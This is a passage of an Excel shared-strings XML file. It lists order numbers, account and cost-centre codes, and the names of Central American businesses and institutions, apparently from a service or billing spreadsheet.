    <t>F4548849</t>
  </si>
  <si>
    <t>770600120T</t>
  </si>
  <si>
    <t>F4548858</t>
  </si>
  <si>
    <t>F4548862</t>
  </si>
  <si>
    <t>F4548863</t>
  </si>
  <si>
    <t>939838OH</t>
  </si>
  <si>
    <t>920400001T</t>
  </si>
  <si>
    <t>COMITE NACIONAL DE ALFABETIZACION -CONALFA-</t>
  </si>
  <si>
    <t>90001910215T</t>
  </si>
  <si>
    <t>F4572719</t>
  </si>
  <si>
    <t>F4572725</t>
  </si>
  <si>
    <t>F4572735</t>
  </si>
  <si>
    <t>F4572752</t>
  </si>
  <si>
    <t>F4572757</t>
  </si>
  <si>
    <t>625900125T</t>
  </si>
  <si>
    <t>F4572772</t>
  </si>
  <si>
    <t>770600135T</t>
  </si>
  <si>
    <t>F4572777</t>
  </si>
  <si>
    <t>8902585T</t>
  </si>
  <si>
    <t>F4572794</t>
  </si>
  <si>
    <t>1084123OH</t>
  </si>
  <si>
    <t>F4572805</t>
  </si>
  <si>
    <t>F4572816</t>
  </si>
  <si>
    <t>F4572817</t>
  </si>
  <si>
    <t>F4572818</t>
  </si>
  <si>
    <t>F4572831</t>
  </si>
  <si>
    <t>F4572837</t>
  </si>
  <si>
    <t>F4572838</t>
  </si>
  <si>
    <t>5499338ON</t>
  </si>
  <si>
    <t>F4572847</t>
  </si>
  <si>
    <t>F4572848</t>
  </si>
  <si>
    <t>F4572850</t>
  </si>
  <si>
    <t>C-0201602243XT</t>
  </si>
  <si>
    <t>549454OH</t>
  </si>
  <si>
    <t>F4593593</t>
  </si>
  <si>
    <t>F4593595</t>
  </si>
  <si>
    <t>F4593599</t>
  </si>
  <si>
    <t>F4593601</t>
  </si>
  <si>
    <t>47503665T</t>
  </si>
  <si>
    <t>F4593608</t>
  </si>
  <si>
    <t>F4593609</t>
  </si>
  <si>
    <t>F4593611</t>
  </si>
  <si>
    <t>F4593613</t>
  </si>
  <si>
    <t>F4593614</t>
  </si>
  <si>
    <t>F4593615</t>
  </si>
  <si>
    <t>F4593616</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4099</t>
  </si>
  <si>
    <t>F4544868</t>
  </si>
  <si>
    <t>90001907406T</t>
  </si>
  <si>
    <t>IP2042037SV</t>
  </si>
  <si>
    <t>F4591574</t>
  </si>
  <si>
    <t>IP2165189SV</t>
  </si>
  <si>
    <t>496800001T</t>
  </si>
  <si>
    <t>ENERGIA SOLAR CENTROAMERICANA S.A.</t>
  </si>
  <si>
    <t>22076868SV</t>
  </si>
  <si>
    <t>F4591588</t>
  </si>
  <si>
    <t>47504129T</t>
  </si>
  <si>
    <t>F4591589</t>
  </si>
  <si>
    <t>F4591591</t>
  </si>
  <si>
    <t>F4591592</t>
  </si>
  <si>
    <t>F4591595</t>
  </si>
  <si>
    <t>F4591599</t>
  </si>
  <si>
    <t>F4591604</t>
  </si>
  <si>
    <t>F4591607</t>
  </si>
  <si>
    <t>29500065T</t>
  </si>
  <si>
    <t>90001901967T</t>
  </si>
  <si>
    <t>F4591620</t>
  </si>
  <si>
    <t>381600003T</t>
  </si>
  <si>
    <t>71300004T</t>
  </si>
  <si>
    <t>SEABOARD MARINE</t>
  </si>
  <si>
    <t>F4591627</t>
  </si>
  <si>
    <t>297400142T</t>
  </si>
  <si>
    <t>F4591630</t>
  </si>
  <si>
    <t>652400099T</t>
  </si>
  <si>
    <t>245700248T</t>
  </si>
  <si>
    <t>F4591655</t>
  </si>
  <si>
    <t>F4591661</t>
  </si>
  <si>
    <t>MP262016006SSV</t>
  </si>
  <si>
    <t>630012ON</t>
  </si>
  <si>
    <t>F4591679</t>
  </si>
  <si>
    <t>806300120T</t>
  </si>
  <si>
    <t>F4591693</t>
  </si>
  <si>
    <t>F4591694</t>
  </si>
  <si>
    <t>F4591699</t>
  </si>
  <si>
    <t>F4591700</t>
  </si>
  <si>
    <t>434600013T</t>
  </si>
  <si>
    <t>F4591706</t>
  </si>
  <si>
    <t>F4591708</t>
  </si>
  <si>
    <t>F4591715</t>
  </si>
  <si>
    <t>297400918T</t>
  </si>
  <si>
    <t>3925960ON</t>
  </si>
  <si>
    <t>F4606368</t>
  </si>
  <si>
    <t>F4606392</t>
  </si>
  <si>
    <t>F4606415</t>
  </si>
  <si>
    <t>F4571140</t>
  </si>
  <si>
    <t>F4571143</t>
  </si>
  <si>
    <t>F4571148</t>
  </si>
  <si>
    <t>IP2037213SV</t>
  </si>
  <si>
    <t>F4571155</t>
  </si>
  <si>
    <t>ON0000621929/MINISTERIO DE LA FAM .PROYECTO PBS              MINISTERIO DE LA FAMILIA PROYECTO PBS</t>
  </si>
  <si>
    <t>F4571159</t>
  </si>
  <si>
    <t>F4571160</t>
  </si>
  <si>
    <t>F4571161</t>
  </si>
  <si>
    <t>770600105T</t>
  </si>
  <si>
    <t>340500038T</t>
  </si>
  <si>
    <t>427100004T</t>
  </si>
  <si>
    <t>F4571191</t>
  </si>
  <si>
    <t>1732561OH</t>
  </si>
  <si>
    <t>F4571204</t>
  </si>
  <si>
    <t>282500003T</t>
  </si>
  <si>
    <t>MILENIUM DISTRIBUIDORA S.A.</t>
  </si>
  <si>
    <t>F4571211</t>
  </si>
  <si>
    <t>F4571213</t>
  </si>
  <si>
    <t>F4571218</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_QUETZALTENANGO</t>
  </si>
  <si>
    <t>4309079ON</t>
  </si>
  <si>
    <t>F4571229</t>
  </si>
  <si>
    <t>F4571232</t>
  </si>
  <si>
    <t>758500043T</t>
  </si>
  <si>
    <t>758500116T</t>
  </si>
  <si>
    <t>90001905281T</t>
  </si>
  <si>
    <t>F4615375</t>
  </si>
  <si>
    <t>475552ON</t>
  </si>
  <si>
    <t>F4615379</t>
  </si>
  <si>
    <t>F4615381</t>
  </si>
  <si>
    <t>F4615383</t>
  </si>
  <si>
    <t>F4615384</t>
  </si>
  <si>
    <t>F4615386</t>
  </si>
  <si>
    <t>22065800SV</t>
  </si>
  <si>
    <t>GYS S.A DE C.V</t>
  </si>
  <si>
    <t>F4615389</t>
  </si>
  <si>
    <t>F4615395</t>
  </si>
  <si>
    <t>F4615408</t>
  </si>
  <si>
    <t>F4615415</t>
  </si>
  <si>
    <t>F4615416</t>
  </si>
  <si>
    <t>782916OH</t>
  </si>
  <si>
    <t>OH1000672807/OPERADORA DE PUERTO CORTES S A DE C V -</t>
  </si>
  <si>
    <t>774806OH</t>
  </si>
  <si>
    <t>F4615419</t>
  </si>
  <si>
    <t>F4615420</t>
  </si>
  <si>
    <t>47504011T</t>
  </si>
  <si>
    <t>F4615442</t>
  </si>
  <si>
    <t>F4615447</t>
  </si>
  <si>
    <t>F4615449</t>
  </si>
  <si>
    <t>F4615451</t>
  </si>
  <si>
    <t>F4615456</t>
  </si>
  <si>
    <t>839000001T</t>
  </si>
  <si>
    <t>PETROLERA GUATEMALTECA, S.A.</t>
  </si>
  <si>
    <t>1320792OH</t>
  </si>
  <si>
    <t>RONNI SAENZ</t>
  </si>
  <si>
    <t>F4615460</t>
  </si>
  <si>
    <t>697500004T</t>
  </si>
  <si>
    <t>F4615463</t>
  </si>
  <si>
    <t>F4615465</t>
  </si>
  <si>
    <t>660600001T</t>
  </si>
  <si>
    <t>F4615471</t>
  </si>
  <si>
    <t>F4615472</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_SAN_MARCOS</t>
  </si>
  <si>
    <t>671900004T</t>
  </si>
  <si>
    <t>F4615478</t>
  </si>
  <si>
    <t>F4615480</t>
  </si>
  <si>
    <t>F4615482</t>
  </si>
  <si>
    <t>93400008T</t>
  </si>
  <si>
    <t>973210OH</t>
  </si>
  <si>
    <t>F4572561</t>
  </si>
  <si>
    <t>F4572577</t>
  </si>
  <si>
    <t>F4572583</t>
  </si>
  <si>
    <t>F4572592</t>
  </si>
  <si>
    <t>F4572604</t>
  </si>
  <si>
    <t>F4572618</t>
  </si>
  <si>
    <t>1657915OH</t>
  </si>
  <si>
    <t>F4572645</t>
  </si>
  <si>
    <t>F4572647</t>
  </si>
  <si>
    <t>427100016T</t>
  </si>
  <si>
    <t>F4572666</t>
  </si>
  <si>
    <t>F4572684</t>
  </si>
  <si>
    <t>F4572691</t>
  </si>
  <si>
    <t>F4572695</t>
  </si>
  <si>
    <t>F4572708</t>
  </si>
  <si>
    <t>25105200SV</t>
  </si>
  <si>
    <t>1041874OH</t>
  </si>
  <si>
    <t>F4621576</t>
  </si>
  <si>
    <t>F4621582</t>
  </si>
  <si>
    <t>910400064T</t>
  </si>
  <si>
    <t>F4621583</t>
  </si>
  <si>
    <t>47502747T</t>
  </si>
  <si>
    <t>F4621589</t>
  </si>
  <si>
    <t>F4621597</t>
  </si>
  <si>
    <t>F4621598</t>
  </si>
  <si>
    <t>897400008T</t>
  </si>
  <si>
    <t>IDG002426SV</t>
  </si>
  <si>
    <t>873800001T</t>
  </si>
  <si>
    <t>F4621626</t>
  </si>
  <si>
    <t>CONTR0001684079OC</t>
  </si>
  <si>
    <t>894900007T</t>
  </si>
  <si>
    <t>F4621653</t>
  </si>
  <si>
    <t>733900001T</t>
  </si>
  <si>
    <t>INVERSIONES ALSO, S.A</t>
  </si>
  <si>
    <t>ID1045071SV</t>
  </si>
  <si>
    <t>LOS TEQUES S.A.DE C.V.</t>
  </si>
  <si>
    <t>25266500SV</t>
  </si>
  <si>
    <t>DPG S.A. DE C.V. DPG S.A. DEC.</t>
  </si>
  <si>
    <t>F4621687</t>
  </si>
  <si>
    <t>47503516T</t>
  </si>
  <si>
    <t>F4621695</t>
  </si>
  <si>
    <t>F4621716</t>
  </si>
  <si>
    <t>543400001T</t>
  </si>
  <si>
    <t>ALIADOS AGROINDUSTRIALES S.A.</t>
  </si>
  <si>
    <t>806300526T</t>
  </si>
  <si>
    <t>344400791T</t>
  </si>
  <si>
    <t>F4549672</t>
  </si>
  <si>
    <t>1159468OH</t>
  </si>
  <si>
    <t>70044OH</t>
  </si>
  <si>
    <t>F4549704</t>
  </si>
  <si>
    <t>F4549728</t>
  </si>
  <si>
    <t>F4549747</t>
  </si>
  <si>
    <t>F4549765</t>
  </si>
  <si>
    <t>F4549806</t>
  </si>
  <si>
    <t>F4549836</t>
  </si>
  <si>
    <t>F4575404</t>
  </si>
  <si>
    <t>F4575429</t>
  </si>
  <si>
    <t>F4575446</t>
  </si>
  <si>
    <t>F4575448</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_TIENDA_4070</t>
  </si>
  <si>
    <t>F4575463</t>
  </si>
  <si>
    <t>F4575468</t>
  </si>
  <si>
    <t>F4575470</t>
  </si>
  <si>
    <t>F4575472</t>
  </si>
  <si>
    <t>8200066T</t>
  </si>
  <si>
    <t>F4575480</t>
  </si>
  <si>
    <t>565100002T</t>
  </si>
  <si>
    <t>GRUPO VIDEM, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4575488</t>
  </si>
  <si>
    <t>F4575489</t>
  </si>
  <si>
    <t>F4575490</t>
  </si>
  <si>
    <t>1107394OH</t>
  </si>
  <si>
    <t>1668343OH</t>
  </si>
  <si>
    <t>1045341OH</t>
  </si>
  <si>
    <t>F4575503</t>
  </si>
  <si>
    <t>F4575505</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4346</t>
  </si>
  <si>
    <t>F4575510</t>
  </si>
  <si>
    <t>F4575514</t>
  </si>
  <si>
    <t>IDG002521SV</t>
  </si>
  <si>
    <t>ICAT, S.A DE C.V.</t>
  </si>
  <si>
    <t>427100173T</t>
  </si>
  <si>
    <t>F4575527</t>
  </si>
  <si>
    <t>F4575528</t>
  </si>
  <si>
    <t>F4575530</t>
  </si>
  <si>
    <t>F4575535</t>
  </si>
  <si>
    <t>F4575544</t>
  </si>
  <si>
    <t>F4575547</t>
  </si>
  <si>
    <t>477700006T</t>
  </si>
  <si>
    <t>F4575548</t>
  </si>
  <si>
    <t>F4575549</t>
  </si>
  <si>
    <t>477700004T</t>
  </si>
  <si>
    <t>F4575551</t>
  </si>
  <si>
    <t>477700008T</t>
  </si>
  <si>
    <t>F4575552</t>
  </si>
  <si>
    <t>F4575557</t>
  </si>
  <si>
    <t>427100040T</t>
  </si>
  <si>
    <t>F4594806</t>
  </si>
  <si>
    <t>F4594818</t>
  </si>
  <si>
    <t>F4594831</t>
  </si>
  <si>
    <t>F4594837</t>
  </si>
  <si>
    <t>F4594857</t>
  </si>
  <si>
    <t>331000075T</t>
  </si>
  <si>
    <t>F4594869</t>
  </si>
  <si>
    <t>F4594879</t>
  </si>
  <si>
    <t>F4594881</t>
  </si>
  <si>
    <t>F4594897</t>
  </si>
  <si>
    <t>F4594928</t>
  </si>
  <si>
    <t>756200001T</t>
  </si>
  <si>
    <t>MERELEC</t>
  </si>
  <si>
    <t>F4562432</t>
  </si>
  <si>
    <t>F4562434</t>
  </si>
  <si>
    <t>F4562440</t>
  </si>
  <si>
    <t>F4562446</t>
  </si>
  <si>
    <t>5436771ON</t>
  </si>
  <si>
    <t>FG9236G</t>
  </si>
  <si>
    <t>F4562456</t>
  </si>
  <si>
    <t>F4562458</t>
  </si>
  <si>
    <t>F4562461</t>
  </si>
  <si>
    <t>F4562475</t>
  </si>
  <si>
    <t>F4562488</t>
  </si>
  <si>
    <t>770600145T</t>
  </si>
  <si>
    <t>F4562500</t>
  </si>
  <si>
    <t>FG9148G</t>
  </si>
  <si>
    <t>F4562512</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4439</t>
  </si>
  <si>
    <t>F4562514</t>
  </si>
  <si>
    <t>F4562515</t>
  </si>
  <si>
    <t>F4562523</t>
  </si>
  <si>
    <t>F4562524</t>
  </si>
  <si>
    <t>F4562535</t>
  </si>
  <si>
    <t>F4562540</t>
  </si>
  <si>
    <t>F4562547</t>
  </si>
  <si>
    <t>F4562557</t>
  </si>
  <si>
    <t>F4562560</t>
  </si>
  <si>
    <t>F4562568</t>
  </si>
  <si>
    <t>F4562569</t>
  </si>
  <si>
    <t>F4562573</t>
  </si>
  <si>
    <t>292900111T</t>
  </si>
  <si>
    <t>4313160ON</t>
  </si>
  <si>
    <t>F4593263</t>
  </si>
  <si>
    <t>29500086T</t>
  </si>
  <si>
    <t>90001909386T</t>
  </si>
  <si>
    <t>F4593267</t>
  </si>
  <si>
    <t>F4593268</t>
  </si>
  <si>
    <t>F4593274</t>
  </si>
  <si>
    <t>F4593277</t>
  </si>
  <si>
    <t>F4593280</t>
  </si>
  <si>
    <t>F4593291</t>
  </si>
  <si>
    <t>17400296T</t>
  </si>
  <si>
    <t>F4593298</t>
  </si>
  <si>
    <t>F4593301</t>
  </si>
  <si>
    <t>F4593320</t>
  </si>
  <si>
    <t>IP2045253SV</t>
  </si>
  <si>
    <t>IP2040042SV</t>
  </si>
  <si>
    <t>770600169T</t>
  </si>
  <si>
    <t>F4593344</t>
  </si>
  <si>
    <t>F4593352</t>
  </si>
  <si>
    <t>7900209T</t>
  </si>
  <si>
    <t>F4593372</t>
  </si>
  <si>
    <t>F4593375</t>
  </si>
  <si>
    <t>F4593377</t>
  </si>
  <si>
    <t>F4593379</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC007827</t>
  </si>
  <si>
    <t>ID1209006SV</t>
  </si>
  <si>
    <t>F4606441</t>
  </si>
  <si>
    <t>F4606442</t>
  </si>
  <si>
    <t>F4606457</t>
  </si>
  <si>
    <t>F4606458</t>
  </si>
  <si>
    <t>442500006T</t>
  </si>
  <si>
    <t>F4606474</t>
  </si>
  <si>
    <t>F4606503</t>
  </si>
  <si>
    <t>F4606509</t>
  </si>
  <si>
    <t>F4606510</t>
  </si>
  <si>
    <t>F4606529</t>
  </si>
  <si>
    <t>F4606536</t>
  </si>
  <si>
    <t>ID1375000SV</t>
  </si>
  <si>
    <t>F4606558</t>
  </si>
  <si>
    <t>F4606570</t>
  </si>
  <si>
    <t>F4606574</t>
  </si>
  <si>
    <t>1254712OH</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_162</t>
  </si>
  <si>
    <t>F4606581</t>
  </si>
  <si>
    <t>450716ON</t>
  </si>
  <si>
    <t>F4606596</t>
  </si>
  <si>
    <t>F4606597</t>
  </si>
  <si>
    <t>F4606598</t>
  </si>
  <si>
    <t>F4576920</t>
  </si>
  <si>
    <t>F4576922</t>
  </si>
  <si>
    <t>F4576935</t>
  </si>
  <si>
    <t>F4576936</t>
  </si>
  <si>
    <t>25206570SV</t>
  </si>
  <si>
    <t>VINCULOS ESTRATEGICOS, S.A. DE C.V.</t>
  </si>
  <si>
    <t>ID1042038SV</t>
  </si>
  <si>
    <t>COMERCIALIZADORA DE TEXTILES SA DE CV</t>
  </si>
  <si>
    <t>F4576942</t>
  </si>
  <si>
    <t>F4576959</t>
  </si>
  <si>
    <t>856000011T</t>
  </si>
  <si>
    <t>F4576971</t>
  </si>
  <si>
    <t>F4576982</t>
  </si>
  <si>
    <t>F4576990</t>
  </si>
  <si>
    <t>F4576999</t>
  </si>
  <si>
    <t>F4577000</t>
  </si>
  <si>
    <t>F4577001</t>
  </si>
  <si>
    <t>F4577003</t>
  </si>
  <si>
    <t>F4577004</t>
  </si>
  <si>
    <t>8200113T</t>
  </si>
  <si>
    <t>F4577017</t>
  </si>
  <si>
    <t>F4577018</t>
  </si>
  <si>
    <t>F4577024</t>
  </si>
  <si>
    <t>F4577036</t>
  </si>
  <si>
    <t>921500022T</t>
  </si>
  <si>
    <t>F4577045</t>
  </si>
  <si>
    <t>F4577051</t>
  </si>
  <si>
    <t>340500120T</t>
  </si>
  <si>
    <t>F4577055</t>
  </si>
  <si>
    <t>F4577056</t>
  </si>
  <si>
    <t>IP2095001SV</t>
  </si>
  <si>
    <t>F4577064</t>
  </si>
  <si>
    <t>F4577065</t>
  </si>
  <si>
    <t>F4577072</t>
  </si>
  <si>
    <t>F4577075</t>
  </si>
  <si>
    <t>1684029OH</t>
  </si>
  <si>
    <t>INGENIERIA AGRICOLA Y GANADERA S.A DE C.V</t>
  </si>
  <si>
    <t>F4616007</t>
  </si>
  <si>
    <t>90001905929T</t>
  </si>
  <si>
    <t>IPG003070SV</t>
  </si>
  <si>
    <t>BANCO IZALQUEÐO DE LOS TRABAJADORES SOC. COOP. R.L. DE C.V.</t>
  </si>
  <si>
    <t>F4616059</t>
  </si>
  <si>
    <t>999805OH</t>
  </si>
  <si>
    <t>F4616077</t>
  </si>
  <si>
    <t>F4616105</t>
  </si>
  <si>
    <t>829800055T</t>
  </si>
  <si>
    <t>F4616126</t>
  </si>
  <si>
    <t>F4573526</t>
  </si>
  <si>
    <t>F4573532</t>
  </si>
  <si>
    <t>F4573536</t>
  </si>
  <si>
    <t>F4573540</t>
  </si>
  <si>
    <t>F4573553</t>
  </si>
  <si>
    <t>F4573562</t>
  </si>
  <si>
    <t>F4573567</t>
  </si>
  <si>
    <t>F4573571</t>
  </si>
  <si>
    <t>F4573579</t>
  </si>
  <si>
    <t>F4573580</t>
  </si>
  <si>
    <t>F4573584</t>
  </si>
  <si>
    <t>F4573586</t>
  </si>
  <si>
    <t>F4573597</t>
  </si>
  <si>
    <t>F4573598</t>
  </si>
  <si>
    <t>F4573599</t>
  </si>
  <si>
    <t>F4573600</t>
  </si>
  <si>
    <t>F4573601</t>
  </si>
  <si>
    <t>F4573602</t>
  </si>
  <si>
    <t>F4573604</t>
  </si>
  <si>
    <t>F4573620</t>
  </si>
  <si>
    <t>F4573624</t>
  </si>
  <si>
    <t>F4573625</t>
  </si>
  <si>
    <t>F4573626</t>
  </si>
  <si>
    <t>F4573628</t>
  </si>
  <si>
    <t>F4573629</t>
  </si>
  <si>
    <t>F4573630</t>
  </si>
  <si>
    <t>F4573631</t>
  </si>
  <si>
    <t>F4573634</t>
  </si>
  <si>
    <t>F4573635</t>
  </si>
  <si>
    <t>F4573637</t>
  </si>
  <si>
    <t>F4573639</t>
  </si>
  <si>
    <t>F4573640</t>
  </si>
  <si>
    <t>425500033T</t>
  </si>
  <si>
    <t>796700001T</t>
  </si>
  <si>
    <t>SOLSAT</t>
  </si>
  <si>
    <t>254100016T</t>
  </si>
  <si>
    <t>F4550507</t>
  </si>
  <si>
    <t>F4550520</t>
  </si>
  <si>
    <t>F4550523</t>
  </si>
  <si>
    <t>F4550527</t>
  </si>
  <si>
    <t>F4550529</t>
  </si>
  <si>
    <t>F4550548</t>
  </si>
  <si>
    <t>F4550549</t>
  </si>
  <si>
    <t>F4550565</t>
  </si>
  <si>
    <t>F4550569</t>
  </si>
  <si>
    <t>F4550575</t>
  </si>
  <si>
    <t>F4550576</t>
  </si>
  <si>
    <t>F4550577</t>
  </si>
  <si>
    <t>F4550580</t>
  </si>
  <si>
    <t>F4550581</t>
  </si>
  <si>
    <t>F4550584</t>
  </si>
  <si>
    <t>F4550602</t>
  </si>
  <si>
    <t>F4550603</t>
  </si>
  <si>
    <t>F4550605</t>
  </si>
  <si>
    <t>5557855ON</t>
  </si>
  <si>
    <t>F4550629</t>
  </si>
  <si>
    <t>ID1024310SV</t>
  </si>
  <si>
    <t>MANPOWER EL SALVADOR, S.A DE C.V</t>
  </si>
  <si>
    <t>973230OH</t>
  </si>
  <si>
    <t>F4578037</t>
  </si>
  <si>
    <t>F4578046</t>
  </si>
  <si>
    <t>4371771ON</t>
  </si>
  <si>
    <t>F4578058</t>
  </si>
  <si>
    <t>F4578060</t>
  </si>
  <si>
    <t>F4578063</t>
  </si>
  <si>
    <t>F4578067</t>
  </si>
  <si>
    <t>F4578069</t>
  </si>
  <si>
    <t>F4578072</t>
  </si>
  <si>
    <t>F4578074</t>
  </si>
  <si>
    <t>F4578076</t>
  </si>
  <si>
    <t>F4578079</t>
  </si>
  <si>
    <t>F4578081</t>
  </si>
  <si>
    <t>F4578084</t>
  </si>
  <si>
    <t>F4578091</t>
  </si>
  <si>
    <t>F4578097</t>
  </si>
  <si>
    <t>F4578100</t>
  </si>
  <si>
    <t>F4578104</t>
  </si>
  <si>
    <t>F4578105</t>
  </si>
  <si>
    <t>38300611T</t>
  </si>
  <si>
    <t>ID1134024SV</t>
  </si>
  <si>
    <t>F4578113</t>
  </si>
  <si>
    <t>47502665T</t>
  </si>
  <si>
    <t>313900310T</t>
  </si>
  <si>
    <t>ID1267003SV</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_METRO_PLAZA_PETEN</t>
  </si>
  <si>
    <t>F4578128</t>
  </si>
  <si>
    <t>878300004T</t>
  </si>
  <si>
    <t>LA SEGURIDAD GLOBAL, S.A.</t>
  </si>
  <si>
    <t>F4578144</t>
  </si>
  <si>
    <t>856000001T</t>
  </si>
  <si>
    <t>3575450ON</t>
  </si>
  <si>
    <t>90001910300T</t>
  </si>
  <si>
    <t>F4578150</t>
  </si>
  <si>
    <t>F4578151</t>
  </si>
  <si>
    <t>F4578155</t>
  </si>
  <si>
    <t>343100020T</t>
  </si>
  <si>
    <t>F4578159</t>
  </si>
  <si>
    <t>874300001T</t>
  </si>
  <si>
    <t>COMPAÑIA S&amp;M S.A.</t>
  </si>
  <si>
    <t>F4578176</t>
  </si>
  <si>
    <t>F4578177</t>
  </si>
  <si>
    <t>20559665</t>
  </si>
  <si>
    <t>F4596634</t>
  </si>
  <si>
    <t>625900027T</t>
  </si>
  <si>
    <t>625900038T</t>
  </si>
  <si>
    <t>625900051T</t>
  </si>
  <si>
    <t>F4596714</t>
  </si>
  <si>
    <t>F4596717</t>
  </si>
  <si>
    <t>F4564840</t>
  </si>
  <si>
    <t>917300016T</t>
  </si>
  <si>
    <t>F4564848</t>
  </si>
  <si>
    <t>F4564852</t>
  </si>
  <si>
    <t>F4564853</t>
  </si>
  <si>
    <t>1319935OH</t>
  </si>
  <si>
    <t>F4564861</t>
  </si>
  <si>
    <t>F4564862</t>
  </si>
  <si>
    <t>418100002T</t>
  </si>
  <si>
    <t>SUREÑA S.A.</t>
  </si>
  <si>
    <t>F4564864</t>
  </si>
  <si>
    <t>442500003T</t>
  </si>
  <si>
    <t>F4564877</t>
  </si>
  <si>
    <t>5289940ON</t>
  </si>
  <si>
    <t>F4564885</t>
  </si>
  <si>
    <t>23317000SV</t>
  </si>
  <si>
    <t>MULTIMEDIA NETWORK, SA DE CV</t>
  </si>
  <si>
    <t>F4564904</t>
  </si>
  <si>
    <t>935800001T</t>
  </si>
  <si>
    <t>APPLUS NORCONTROL DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4564920</t>
  </si>
  <si>
    <t>F4564921</t>
  </si>
  <si>
    <t>F4564924</t>
  </si>
  <si>
    <t>F4564927</t>
  </si>
  <si>
    <t>F4564930</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4455</t>
  </si>
  <si>
    <t>297400021T</t>
  </si>
  <si>
    <t>619500041T</t>
  </si>
  <si>
    <t>F4564948</t>
  </si>
  <si>
    <t>F4564950</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0104</t>
  </si>
  <si>
    <t>ID1026275SV</t>
  </si>
  <si>
    <t>F4564957</t>
  </si>
  <si>
    <t>IDG000275SV</t>
  </si>
  <si>
    <t>90001910058T</t>
  </si>
  <si>
    <t>F4564970</t>
  </si>
  <si>
    <t>90001911052T</t>
  </si>
  <si>
    <t>F4564976</t>
  </si>
  <si>
    <t>415500002T</t>
  </si>
  <si>
    <t>COMPAÑIA DE LOGISTICA Y TRANSPORTE S.A.</t>
  </si>
  <si>
    <t>F4593903</t>
  </si>
  <si>
    <t>F4593907</t>
  </si>
  <si>
    <t>F4593909</t>
  </si>
  <si>
    <t>F4593912</t>
  </si>
  <si>
    <t>F4593915</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_MORALES_035</t>
  </si>
  <si>
    <t>F4593917</t>
  </si>
  <si>
    <t>869700001T</t>
  </si>
  <si>
    <t>AGENCIA DE SEGUROS Y FINZAS M&amp;C, S.A.</t>
  </si>
  <si>
    <t>F4593921</t>
  </si>
  <si>
    <t>F4593924</t>
  </si>
  <si>
    <t>F4593938</t>
  </si>
  <si>
    <t>F4593939</t>
  </si>
  <si>
    <t>90001910617T</t>
  </si>
  <si>
    <t>F4593946</t>
  </si>
  <si>
    <t>8900711T</t>
  </si>
  <si>
    <t>CC_WALMART_GT_INTERNET_TIENDA_4116</t>
  </si>
  <si>
    <t>F4593973</t>
  </si>
  <si>
    <t>F4593977</t>
  </si>
  <si>
    <t>758500322T</t>
  </si>
  <si>
    <t>F4593981</t>
  </si>
  <si>
    <t>ID1033092SV</t>
  </si>
  <si>
    <t>F4593988</t>
  </si>
  <si>
    <t>F4593991</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_AGENCIA_TIQUISATE</t>
  </si>
  <si>
    <t>90001905335T</t>
  </si>
  <si>
    <t>F4593997</t>
  </si>
  <si>
    <t>F4593998</t>
  </si>
  <si>
    <t>90001907786T</t>
  </si>
  <si>
    <t>F4594004</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3089</t>
  </si>
  <si>
    <t>F4594007</t>
  </si>
  <si>
    <t>F4594009</t>
  </si>
  <si>
    <t>F4594010</t>
  </si>
  <si>
    <t>1072889OH</t>
  </si>
  <si>
    <t>F4594022</t>
  </si>
  <si>
    <t>F4594024</t>
  </si>
  <si>
    <t>F4594025</t>
  </si>
  <si>
    <t>1309042OH</t>
  </si>
  <si>
    <t>F4594033</t>
  </si>
  <si>
    <t>F4594045</t>
  </si>
  <si>
    <t>F4594046</t>
  </si>
  <si>
    <t>F4606754</t>
  </si>
  <si>
    <t>F4606763</t>
  </si>
  <si>
    <t>F4606764</t>
  </si>
  <si>
    <t>F4606766</t>
  </si>
  <si>
    <t>F4606772</t>
  </si>
  <si>
    <t>F4606773</t>
  </si>
  <si>
    <t>F4606789</t>
  </si>
  <si>
    <t>357400011T</t>
  </si>
  <si>
    <t>357400019T</t>
  </si>
  <si>
    <t>F4606820</t>
  </si>
  <si>
    <t>F4606821</t>
  </si>
  <si>
    <t>876100002T</t>
  </si>
  <si>
    <t>F4606824</t>
  </si>
  <si>
    <t>F4606842</t>
  </si>
  <si>
    <t>F4606865</t>
  </si>
  <si>
    <t>629100042T</t>
  </si>
  <si>
    <t>F4606868</t>
  </si>
  <si>
    <t>F4606877</t>
  </si>
  <si>
    <t>F4606894</t>
  </si>
  <si>
    <t>F4606906</t>
  </si>
  <si>
    <t>F4581032</t>
  </si>
  <si>
    <t>F4581035</t>
  </si>
  <si>
    <t>F4581039</t>
  </si>
  <si>
    <t>F4581062</t>
  </si>
  <si>
    <t>F4581064</t>
  </si>
  <si>
    <t>F4581068</t>
  </si>
  <si>
    <t>F4581069</t>
  </si>
  <si>
    <t>F4581093</t>
  </si>
  <si>
    <t>405900004T</t>
  </si>
  <si>
    <t>F4581134</t>
  </si>
  <si>
    <t>F4581141</t>
  </si>
  <si>
    <t>F4581175</t>
  </si>
  <si>
    <t>F4581181</t>
  </si>
  <si>
    <t>F4581192</t>
  </si>
  <si>
    <t>F4616353</t>
  </si>
  <si>
    <t>ID1026110SV</t>
  </si>
  <si>
    <t>F4616367</t>
  </si>
  <si>
    <t>727100077T</t>
  </si>
  <si>
    <t>F4616418</t>
  </si>
  <si>
    <t>F4616419</t>
  </si>
  <si>
    <t>F4616428</t>
  </si>
  <si>
    <t>F4616430</t>
  </si>
  <si>
    <t>345500004T</t>
  </si>
  <si>
    <t>F4616434</t>
  </si>
  <si>
    <t>F4616439</t>
  </si>
  <si>
    <t>F4616444</t>
  </si>
  <si>
    <t>F4616462</t>
  </si>
  <si>
    <t>F4616464</t>
  </si>
  <si>
    <t>IDG002506SV</t>
  </si>
  <si>
    <t>ACCESO FINANCIERO LTDA DE CV</t>
  </si>
  <si>
    <t>F4616476</t>
  </si>
  <si>
